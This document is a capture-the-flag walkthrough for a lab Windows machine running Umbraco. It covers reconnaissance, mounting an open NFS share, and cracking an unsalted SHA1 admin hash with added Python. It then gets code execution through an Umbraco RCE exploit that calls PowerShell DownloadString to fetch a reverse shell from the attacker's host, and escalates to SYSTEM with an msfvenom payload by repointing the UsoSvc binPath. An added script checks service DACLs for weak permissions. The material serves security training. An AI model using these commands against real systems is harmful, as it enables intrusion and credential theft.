NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 13:36 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating Ping Scan at 13:36
Scanning 10.10.10.180 [4 ports]
Completed Ping Scan at 13:36, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:36
Completed Parallel DNS resolution of 1 host. at 13:36, 0.18s elapsed
Initiating SYN Stealth Scan at 13:36
Scanning 10.10.10.180 [1000 ports]
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Completed SYN Stealth Scan at 13:36, 2.35s elapsed (1000 total ports)
Initiating Service scan at 13:36
Scanning 7 services on 10.10.10.180
Completed Service scan at 13:37, 64.48s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.180
Retrying OS detection (try #2) against 10.10.10.180
Initiating Traceroute at 13:37
Completed Traceroute at 13:37, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:37
Completed Parallel DNS resolution of 2 hosts. at 13:37, 0.20s elapsed
NSE: Script scanning 10.10.10.180.
Initiating NSE at 13:37
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 13:37, 10.39s elapsed
Initiating NSE at 13:37
Completed NSE at 13:38, 69.27s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd       1-3 (RPC #100005)
Aggressive OS guesses: Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m56s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-22T08:12:25
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   427.21 ms 10.10.14.1
2   427.21 ms 10.10.10.180

NSE: Script Post-scanning.
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.04 seconds
           Raw packets sent: 1282 (57.820KB) | Rcvd: 1205 (49.548KB)
ENUMERATING PORTS
FTP
Nmap's ftp-anon script reports that anonymous FTP login is allowed (FTP code 230), so that is the first thing to check.
WEBSITE
Let's run gobuster against the site.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #gobuster dir -u http://10.10.10.180/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.180/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/22 13:56:20 Starting gobuster
===============================================================
/blog (Status: 200)
/Blog (Status: 200)
/home (Status: 200)
/Home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/People (Status: 200)
/person (Status: 200)
/products (Status: 200)
/Products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/06/22 13:59:46 Finished
===============================================================
WEBSITE UMBRACO DIRECTORY
/umbraco is the Umbraco CMS back-office login page, so we need a valid username and password before it is any use to us.
PORT 111 / 2049 NFS MOUNT
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
mount.nfs: mount point ./mount does not exist
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mkdir mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #cd mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC/mount]
└──╼ #ls
App_Browsers  App_Plugins  bin  css  Global.asax  scripts  Umbraco_Client  Web.config
App_Data  aspnet_client  Config  default.aspx  Media  Umbraco  Views
The export is readable by everyone, and the backup is a complete Umbraco site. Umbraco keeps its back-office users in the SQL CE database App_Data\Umbraco.sdf, and the admin row pulled out of it gives us the password hash for the Umbraco login:
admin
admin@htb.local
b8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}
admin@htb.local
en-US
feb1a998-d3bf-406a-b30b-e269d7abdf50
The passwordConfig field says the hash is plain SHA1 with no salt, so a wordlist attack (hashcat mode 100, or john) recovers it in seconds:
admin@htb.local : baconandcheese
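The cracking step is only a one-liner in hashcat, but it is worth seeing why an unsalted SHA1 record is so cheap to attack. The Python below is an added example, not code from the walkthrough: it reads the hashAlgorithm out of the passwordConfig JSON, refuses anything that is not a plain unsalted digest, and cracks one or many user records with a single digest computation per wordlist candidate. The record dictionary and the five-word wordlist are constructed for the example (the hash itself is the one shown above).

```python
import hashlib
import json
from typing import Optional

# Constructed sample: the Umbraco admin row from the backup, split into the
# fields that matter (the dump on the page shows them run together).
ADMIN_RECORD = {
    "login": "admin",
    "email": "admin@htb.local",
    "password": "b8be16afba8c314ad33d812f22a04991b90e2aaa",
    "passwordConfig": '{"hashAlgorithm":"SHA1"}',
}

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = ["password", "admin", "Welcome1", "baconandcheese", "letmein"]


def hash_algorithm(password_config: str) -> str:
    """Map the hashAlgorithm named in Umbraco's passwordConfig JSON to a hashlib name.

    Only unsalted digest algorithms are handled; anything else (HMAC- or
    PBKDF2-style configs) is refused rather than silently mis-cracked.
    """
    name = json.loads(password_config)["hashAlgorithm"].upper().replace("-", "")
    supported = {"SHA1": "sha1", "SHA256": "sha256", "SHA512": "sha512", "MD5": "md5"}
    if name not in supported:
        raise ValueError(f"unsupported or salted hash scheme: {name}")
    return supported[name]


def crack_unsalted(hash_hex: str, algo: str, wordlist) -> Optional[str]:
    """Brute-force one unsalted hex digest against a wordlist; None if no hit."""
    target = hash_hex.strip().lower()
    for candidate in wordlist:
        if hashlib.new(algo, candidate.encode("utf-8")).hexdigest() == target:
            return candidate
    return None


def crack_records(records, wordlist) -> dict:
    """Crack many users at once, keyed by e-mail.

    Because the hashes carry no salt, each candidate is hashed once and the
    digest looked up for every user of that algorithm; that single-pass
    property is exactly why unsalted storage is so cheap to attack at scale.
    """
    by_algo = {}
    for rec in records:
        by_algo.setdefault(hash_algorithm(rec["passwordConfig"]), []).append(rec)
    found = {}
    for algo, recs in by_algo.items():
        targets = {rec["password"].lower(): rec["email"] for rec in recs}
        for candidate in wordlist:
            digest = hashlib.new(algo, candidate.encode("utf-8")).hexdigest()
            if digest in targets:
                found[targets[digest]] = candidate
    return found


if __name__ == "__main__":
    print(crack_records([ADMIN_RECORD], WORDLIST))
```

Feed crack_records a list of rows dumped from Umbraco.sdf and a real wordlist to crack every back-office account in one pass; a per-user salt would force one full wordlist pass per user instead.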
GETTING USER ACCESS
Exploiting Umbraco
Umbraco has a public authenticated remote code execution exploit, so the admin credentials recovered from the backup are enough to run commands as the IIS worker process. Here the command launches PowerShell to fetch and run a reverse-shell script served from our machine (reverseps.ps1 on 10.10.14.12:8000):
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8000/reverseps.ps1')"
Netcat Listener
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689
PS C:\windows\temp> whoami
iis apppool\defaultapppool
PS C:\windows\temp>
Let's get a plain cmd.exe shell as well (nc.exe was dropped into C:\windows\temp for this, as the directory listing further down shows):
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49754
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\temp>whoami \priv
whoami \priv
ERROR: Invalid argument/option - '\priv'.
Type "WHOAMI /?" for usage.

C:\windows\temp>whoami
whoami
iis apppool\defaultapppool

C:\windows\temp>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\windows\temp>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\windows\temp>systeminfo
systeminfo

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00521-62775-AA801
Original Install Date:     2/19/2020, 4:03:29 PM
System Boot Time:          6/22/2020, 2:27:18 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,572 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,229 MB
Virtual Memory: In Use:    1,570 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4534119
                           [02]: KB4462930
                           [03]: KB4516115
                           [04]: KB4523204
                           [05]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.180
                                 [02]: fe80::4d8:24d5:55c2:7def
                                 [03]: dead:beef::4d8:24d5:55c2:7def
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\windows\temp>
GETTING ROOT ACCESS
whoami /priv showed SeImpersonatePrivilege enabled, which is itself a well-known escalation path for service accounts; this walkthrough instead abuses the UsoSvc service, whose configuration the app-pool account turns out to be allowed to change. First, build a reverse-shell executable for the service to run. The box is x64 but msfvenom defaults to an x86 payload, which still runs fine under WoW64:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.12 lport=9004 -f exe > liquid.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Now pull it onto the box into C:\windows\temp from the PowerShell shell:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689
PS C:\windows\system32\inetsrv> cd ../../temp
PS C:\windows\temp> invoke-webrequest -Uri http://10.10.14.12:8000/liquid.exe -OutFile liquid.exe
Now stop UsoSvc, point its binPath at the uploaded payload, and start it again. The Service Control Manager launches the binary under the account the service is configured for, LocalSystem in UsoSvc's case, so the payload calls back as NT AUTHORITY\SYSTEM rather than as a mere Administrator. The start will report error 1053 because a plain reverse-shell executable never registers with the SCM; that is expected, but the SCM may kill the process once its start timeout expires, so have the listener waiting and move to a more stable process if the shell drops. Note the original binPath (sc qc usosvc) before changing it so it can be restored afterwards.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49687
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\windows\temp

06/22/2020  05:06 AM    <DIR>          .
06/22/2020  05:06 AM    <DIR>          ..
06/22/2020  03:55 AM    <DIR>          DiagTrack_alternativeTrace
06/22/2020  03:55 AM    <DIR>          DiagTrack_aot
06/22/2020  03:55 AM    <DIR>          DiagTrack_diag
06/22/2020  03:55 AM    <DIR>          DiagTrack_miniTrace
06/22/2020  05:06 AM            73,802 liquid.exe
06/22/2020  05:05 AM            91,724 MpCmdRun.log
02/23/2020  03:20 PM           109,064 MpSigStub.log
06/22/2020  05:04 AM            45,272 nc.exe
06/22/2020  04:55 AM               102 silconfig.log
03/18/2020  04:45 PM    <DIR>          vmware-SYSTEM
03/18/2020  04:45 PM            27,136 vmware-vmsvc.log
02/27/2020  10:45 AM            10,823 vmware-vmusr.log
06/22/2020  04:55 AM               960 vmware-vmvss.log
               8 File(s)        358,883 bytes
               7 Dir(s)  19,409,739,776 bytes free

C:\windows\temp>sc stop usosvc
sc stop usosvc

SERVICE_NAME: usosvc
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

C:\windows\temp>sc config usosvc binpath="c:\windows\temp\liquid.exe"
sc config usosvc binpath="c:\windows\temp\liquid.exe"
[SC] ChangeServiceConfig SUCCESS

C:\windows\temp>sc start usosvc
sc start usosvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\windows\temp>
The listener on 9004 catches the service's reverse shell, running as SYSTEM, and both flags are readable (user.txt lives in C:\Users\Public on this box):
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd ../../Users/Administrator/Desktop
cd ../../Users/Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
9545907ad***********************

C:\Users\Administrator\Desktop>cd ../../Public/Desktop
cd ../../Public/Desktop

C:\Users\Public\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users\Public\Desktop

02/20/2020  03:14 AM             1,191 TeamViewer 7.lnk
               1 File(s)          1,191 bytes
               0 Dir(s)  19,409,514,496 bytes free

C:\Users\Public\Desktop>cd ..
cd ..

C:\Users\Public>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users\Public

02/20/2020  03:42 AM    <DIR>          .
02/20/2020  03:42 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          Documents
09/15/2018  03:19 AM    <DIR>          Downloads
09/15/2018  03:19 AM    <DIR>          Music
09/15/2018  03:19 AM    <DIR>          Pictures
06/22/2020  04:56 AM                34 user.txt
09/15/2018  03:19 AM    <DIR>          Videos
               1 File(s)             34 bytes
               7 Dir(s)  19,409,514,496 bytes free

C:\Users\Public>type user.txt
type user.txt
0653c**************************

C:\Users\Public>
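The walkthrough never shows the check that tells you UsoSvc can be reconfigured by the app-pool account; on the box you would run sc sdshow UsoSvc (or PowerUp-style tooling) and read the service DACL. The Python below is an added example, not code from the walkthrough: it parses the SDDL string sc sdshow prints, expands the two-letter rights into their service-specific meanings, and reports whether a given set of token SIDs can take the service over (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or GENERIC_ALL), honouring deny ACEs in the same order Windows does. The two DACLs and the app-pool SID set are constructed for the example; the real UsoSvc DACL on the box is not shown on this page.

```python
import re

# Service-specific meaning of the two-letter SDDL rights printed by `sc sdshow`.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",   "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",   "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",          "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL",           "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",            "GA": "GENERIC_ALL",
}

# Any of these lets the holder repoint binPath, or grant itself the right to.
TAKEOVER_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL"}

# Principals expected to control services: Local System, Builtin Administrators.
TRUSTED_SIDS = {"SY", "BA"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def dacl_aces(sddl: str) -> str:
    """Return the run of ACEs after 'D:' (skipping DACL flags such as P/AI/AR)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("SDDL has no DACL")
    return m.group(1)


def split_rights(token: str):
    """'CCDCLC' -> ['CC', 'DC', 'LC']; a raw hex mask is passed through untouched."""
    if token.startswith("0x"):
        return [token]
    if len(token) % 2:
        raise ValueError(f"odd-length rights string: {token}")
    return [token[i:i + 2] for i in range(0, len(token), 2)]


def parse_aces(sddl: str):
    """Parse the DACL into dicts: type ('A' allow / 'D' deny), sid, set of rights."""
    aces = []
    for body in ACE_RE.findall(dacl_aces(sddl)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, _flags, rights, _obj, _inh, sid = fields
        aces.append({
            "type": ace_type,
            "sid": sid,
            "rights": {SERVICE_RIGHTS.get(r, r) for r in split_rights(rights)},
        })
    return aces


def can_take_over(sddl: str, caller_sids) -> bool:
    """Walk the DACL in order as the kernel does: a matching deny ACE wins
    before any later allow; an allow granting a takeover right wins otherwise."""
    for ace in parse_aces(sddl):
        if ace["sid"] not in caller_sids or not (ace["rights"] & TAKEOVER_RIGHTS):
            continue
        if ace["type"] == "D":
            return False
        if ace["type"] == "A":
            return True
    return False


def weak_aces(sddl: str):
    """Allow ACEs that hand takeover rights to anyone other than SYSTEM/Administrators."""
    return [a for a in parse_aces(sddl)
            if a["type"] == "A" and a["sid"] not in TRUSTED_SIDS
            and a["rights"] & TAKEOVER_RIGHTS]


# Constructed DACLs (not captured from the box). HARDENED only lets SYSTEM and
# Administrators change the service; WEAK also grants Authenticated Users (AU)
# SERVICE_CHANGE_CONFIG (DC), SERVICE_START (RP) and SERVICE_STOP (WP).
HARDENED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Assumed group SIDs in an IIS app-pool token: Authenticated Users, SERVICE, Users.
APPPOOL_SIDS = {"AU", "SU", "BU"}

if __name__ == "__main__":
    for name, sddl in (("HARDENED", HARDENED), ("WEAK", WEAK)):
        print(name, "takeover possible:", can_take_over(sddl, APPPOOL_SIDS),
              "weak ACEs:", [a["sid"] for a in weak_aces(sddl)])
```

Paste the output of sc sdshow for any service into can_take_over together with the SIDs from whoami /groups to decide whether the sc config trick above will work before touching the service; weak_aces is the blue-team view of the same data and is what a hardening audit should run across every service on a build.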
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE